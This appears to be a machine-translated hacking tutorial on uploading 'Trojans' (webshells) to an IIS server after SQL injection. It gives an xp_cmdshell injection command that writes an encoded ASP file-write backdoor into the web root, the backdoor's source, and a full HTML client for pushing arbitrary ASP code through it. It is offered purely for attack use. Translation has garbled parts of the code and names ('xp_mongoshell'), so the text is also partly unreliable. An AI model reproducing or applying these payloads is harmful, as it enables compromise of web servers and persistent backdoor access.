After SQL injection, how to upload Trojans has always been a headache. Here I provide another method for uploading Trojans.
1. During SQL injection, xp_mongoshell is used to write an ASP file that can write files to the server.
File Content:
<%
Set objfso = server. Createobject
("Scripting. FileSystemObject ")
Set objcountfile = objfso. createtextfile
(Request ("mypath"), true)
Objcountfile. Write Request ("mydata ")
Objcountfile. Close
%>
This file can be written as a line
<% Set objfso = server. Createobject
("Scripting. FileSystemObject "):
Set objcountfile = objfso. createtextfile
(Request ("mypath"), true): objcountfile. Write Request ("mydata "):
Objcountfile. Close %>
Encode special characters to obtain
% 3C % 25 set % 20 objfso % 20 = % 20server. Createobject
(% 22scripting. FileSystemObject % 22 ):
Set % 20 objcountfile = objfso. createtextfile (Request (% 22 mypath % 22), true ):
Objcountfile. Write % 20 Request (% 22 mydata % 22): objcountfile. Close % 25% 3E
Injection (assume that the web directory is C:/inetpub/wwwroot /):
Exec master .. xp_mongoshell 'echo
"% 3C % 25 set % 20 objfso % 20 = % 20server. Createobject
(% 22scripting. FileSystemObject % 22 ):
Set % 20 objcountfile = objfso. createtextfile
(Request (% 22 mypath % 22), true ):
Objcountfile. Write % 20 Request (% 22 mydata % 22 ):
Objcountfile. Close % 25% 3e "> C:/inetpub/wwwroot/ftp. asp ';
In this way, an FTP. asp file will be generated under the web directory of the server.
The code for this file is
<%
Set objfso = server. Createobject
("Scripting. FileSystemObject ")
Set objcountfile = objfso. createtextfile
(Request ("mypath"), true)
Objcountfile. Write Request
("Mydata ")
Objcountfile. Close
%>
As you can see, the above Code reserves two interfaces: mypath and mydata.
Mypath is the file generation path for the next submission.
Mydata is the file content
Write a client file locally. The rohuclient.htm code is as follows:
<! Doctype HTML public "-// W3C // dtd html 4.01 transitional // en">
<HTML>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Title> zombie file generator -- client creation: absolute zero QQ: 12216796 </title>
<Style type = "text/CSS">
<! --
TD {
Font-size: 9pt; line-Height: 150%
}
Body {
Font-size: 12px;
Font-family: verdana, Arial, Helvetica, sans-serif,;
SCROLLBAR-FACE-COLOR: # eeeeee;
SCROLLBAR-HIGHLIGHT-COLOR: # ffffff;
SCROLLBAR-SHADOW-COLOR: # dee3e7;
SCROLLBAR-3DLIGHT-COLOR: # d1d7dc;
SCROLLBAR-ARROW-COLOR: #006699;
SCROLLBAR-TRACK-COLOR: # ededed;
SCROLLBAR-DARKSHADOW-COLOR: #98aab1
}
A: link {
Font-size: 9pt; color: #363636; line-Height: 18px; text-Decoration: None
}
A: visited {
Font-size: 9pt; color: #363636; line-Height: 18px; text-Decoration: None
}
A: hover {
Color: # cc0000; line-Height: 18px; text-Decoration: underline
}
Input, select, textarea {
Font-family: "tahoma", "Arial", "Helvetica", "Sans-serif", "";
Background-color: # f9f9f9;
Font-size: 9pt;
Border: 1px # d2d2d2 dobble;
Line-Height: 120%;
}
-->
</Style>
</Head>
<Script language = "JavaScript" type = "text/JavaScript">
Function chk (theform)
{
If (theform. ftpurl. value = '')
{
Alert ('Enter the submitted address! ');
Theform. ftpurl. Focus ();
Return false;
}
If (theform. mypath. value = '')
{
Alert ('Enter the location of the generated file! ');
Theform. mypath. Focus ();
Return false;
}
If (theform. mydata. value = '')
{
Alert ('Enter the content of the generated file! ');
Theform. mydata. Focus ();
Return false;
}
Theform. Action = theform. ftpurl. value;
}
</SCRIPT>
<Body>
<Form name = "rohuform" method = "Post"
Action = "" onsubmit = "Return chk (this)" target = "_ blank">
<Table width = "673" border = "0" align = "center"
Cellpadding = "0" cellspacing = "0">
<Tr>
<TD width = "11%"> Target Location: </TD>
& Lt; TD width = "79%" & gt; <input name = "ftpurl"
Type = "text" id = "ftpurl" size = "50">
Example: http: // 127.0.0.1/ftp. asp <;/TD>
</Tr>
<Tr>
<TD> Generate a file: </TD>
<TD> <input name = "mypath" type = "text" id = "mypath">
The file path generated on the server. Example:
C:/inetpub/wwwroot/server. asp </TD>
</Tr>
<Tr>
<TD valign = "TOP"> file code: </TD>
<TD> <textarea name = "mydata" Cols = "100"
Rows = "10" id = "textarea"> </textarea> </TD>
</Tr>
<Tr>
<TD> </TD>
<TD> <input type = "Submit" name = "Submit" value = "Submit"> </TD>
</Tr>
</Table>
<Br>
</Form>
<Table width = "100%" border = "0" cellspacing = "0" cellpadding = "0">
<Tr>
<TD align = "center"> All Rights Reserved:
XXXX (<a href = http://www.rxxx.com;> XX umeng </a>) </TD>
</Tr>
</Table>
</Body>
</Html>
Fill in the URL of the generated ftp. asp file in the target location column.
For example, http: // 127.0.0.1/ftp. asp (assume that the server IP address is 127.0.0.1)
Enter the file name that will be generated on the server in the generated file column, for example, C:/inetpub/wwwroot/server. asp.
Paste an ASP code randomly in the file content
Click Submit. When the http: // 127.0.0.1/ftp. asp file is executed, ASP Trojans are generated on the server.